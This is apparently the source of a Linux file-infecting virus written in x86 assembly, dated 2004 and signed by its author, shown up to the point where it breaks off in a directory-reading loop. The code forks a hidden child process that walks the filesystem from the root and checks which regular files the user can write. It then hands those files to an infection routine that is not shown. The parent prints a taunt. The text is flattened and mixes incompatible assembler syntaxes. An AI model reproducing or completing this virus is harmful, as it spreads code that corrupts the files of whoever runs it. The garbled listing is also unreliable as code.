;###################################################################;################### www.cyneox.tk #################################;###################################################################;;; 9.5.2004 by cyneox;------------------------------------------------------------------%define SYS_EXIT 1%define SYS_FORK 2%define SYS_WRITE 4%define SYS_OPEN 5%define SYS_CLOSE 6%define SYS_CHDIR 12%define SYS_GETUID 24%define SYS_GETGID 47%define SYS_READDIR 89%define SYS_MMAP 90%define SYS_MUNMAP 91%define SYS_STAT 106%define SYS_GETCWD 183%define HERDERV_SZ 0x1000%define STDOUT 1%define STAT_SIZE 64%define MMAP_SIZE 24%define DIRENT_SIZE 266%define STR_STAT_OFF 72 %define REG_FILE 10q%define IS_DIR 4q%define PATH_LENGHT 128 %define FIRST_DIR 0x2f%define FILE_STACK 50%define READ_WRITE 3%define MAP_PRIVATE 2%define ELF 0x464c457f.386.model flat, stdcalllocals;include win32api.inc.dataherder db "i l0v3 h3rd3r",0xa,0len equ $-herdersection .textglobal main.code;########################## MAIN #####################################main: pusha pushf push ebp ; push ebp; mov ebp,esp; sub esp,0; mov esp,ebp ; VERY IMPORTANT!!! DON'T WRITE "mov ebp,esp" ; !!!! FATAL CAUSES ! ; forking.. mov eax,SYS_FORK mov ebx,0 int 0x80 ; compare if parent or child is active cmp eax,0 jne parent ;######################## CHILD ######################################child: ; getting uid of user mov eax,SYS_GETUID int 0x80 ; pushing uid on stack... push eax ; [ebp-4]=[eax]=uid ; getting gid of user... mov eax,SYS_GETGID int 0x80 ; pushing gid on stack... push eax ; [ebp-8]=gid ; saving "space" for the stat structure needed later... sub esp,STAT_SIZE ; [ebp-72]=struct stat push dword 0 ; [ebp-76] push dword FIRST_DIR ; directory to begin to scan; [ebp-80] push dword 7 ; write permissions... ; scan FIRST_DIR ... 
call scan add esp,12 ; restoring stat structure add esp,64 ; restoring uid and gid add esp,8 ; here finishes the child jmp exit ;###################### PARENT ########################################parent: mov eax,SYS_WRITE mov ebx,STDOUT mov ecx,parent mov edx,len int 0x80 parent_process: pop ebp popf popa jmp old_prog old_prog: mov eax,1 mov ebx,0 int 0x80;###################### SCAN ##########################################scan: mov esi,esp add esi,8 ; [esi+8]=filename mov edi,esp add edi,4 ; [edi+4]=<write permissions> ;mov eax,esi ;call print_string ; defining some variables that our virus will need later... ;######## variables ######## sub esp,4 ; needed for fd sub esp,1 ; needed for permissions of the host file... 00-07 sub esp,1 ; file type : REG_FILE or IS_DIR sub esp,PATH_LENGHT ; needed for the path name of file.... ; we're going to *stat* our filename ... mov eax,SYS_STAT mov ebx,esi ; pointer to filename mov ecx,ebp sub ecx,STR_STAT_OFF ; ecx -> pointer to our stat structure int 0x80 cmp eax,0 jge ok_stat jmp err_stat ;#################### OK_STAT ########################################## ok_stat: ; first of all we must verify the permissions on directory/file mov ebx,ebp sub ebx,STR_STAT_OFF ; point to the stat-structure mov ax,[ebx+8] ; stat.st_mode=[ebx+8] : *take a look at ; the stat structure in asm/types.h* mov dx,ax mov cx,word [ebx+12] ; stat.st_uid=[ebx+12] cmp word cx,[ebp-4] ; [ebp-4]=uid of user je u_perms mov cx,word [ebx+14] ; stat.st_gid=[ebx+14] cmp word cx,[ebp-8] ; [ebp-8]=gid of user je g_perms cmp word [ebp-8],0 ; is this root(uid=0) ??? 
je u_perms ;################### O_PERMS ########################################## ; others permissions o_perms: and al,7q jmp perms ;################### U_PERMS ########################################## ; user permissionsu_perms: shr ax,6 and al,7q jmp perms ;################### G_PERMS ######################################### ; group permissionsg_perms: shr ax,3 and al,7q ;################### PERMS ########################################### perms: mov byte [esp+PATH_LENGHT+1],al ; store file permissions ; of user ;################## F_TYPE ########################################### ; now we must verify the file type: REG_FILE or IS_DIR f_type: mov ebx,ebp sub ebx,STR_STAT_OFF ; pointer to stat structure mov ax,[ebx+8] ; stat.st_mode=[ebx+8] and ax,170000q ; bit mask for file type shr ax,12 mov byte [esp+PATH_LENGHT],al ; store file type ; check if REG_FILE or IS_DIR ??? mov al,byte [esp+128] cmp al,4q je is_direc ; jmp if "file"==IS_DIR cmp al,10q je is_reg_file ; jmp if "file"==REG_FILE jmp err_scan ;###################### IS_REG_FILE ####################################### is_reg_file: ;mov eax,file ;call print_string mov ecx,[edi] and cl,2q cmp cl,2q je file_par_per ; if we have parent permissions on file jmp err_scan ;##################### FILE_PAR_PER #######################################file_par_per: mov cl,byte [esp+128+1] ; check if we have write permissions ; on file and cl,2q cmp cl,2q je file2 jmp err_scan;#################### FILE2 ##############################################file2: call check_file jmp err_scan;###################### IS_DIR ###########################################is_direc: ; saving curent working directory to the stack mov eax,SYS_GETCWD mov ebx,esp mov ecx,PATH_LENGHT int 0x80 ;mov eax,dir ;call print_string ; open directory... 
mov eax,SYS_OPEN mov ebx,esi ; esi=pointer to directoy(filename) mov ecx,0 ; O_RDONLY mov edx,0 int 0x80 cmp eax,0 jge ok_dir ; jump if(eax>=0) jmp err_scan ;~~~~~~~~~~~~~~~~~~~~~~~~ OK_DIR ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ok_dir: mov [esp+128+2],eax ; move filedescriptor to our stack ; variables ; move to that directory... mov eax,SYS_CHDIR mov ebx,esi int 0x80 ; alocate space for the dirent structure sub esp,DIRENT_SIZE ;~~~~~~~~~~~~~~~~~~~~~~~ READDIR ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ readdir: mov eax,SYS_READDIR mov ebx,[esp+DIRENT_SIZE+128+2] ; fd mov ecx,esp mov edx,1 int 0x80 cmp eax,1 jne near err_readdir ; we'll seach every file and then we'll call scan for it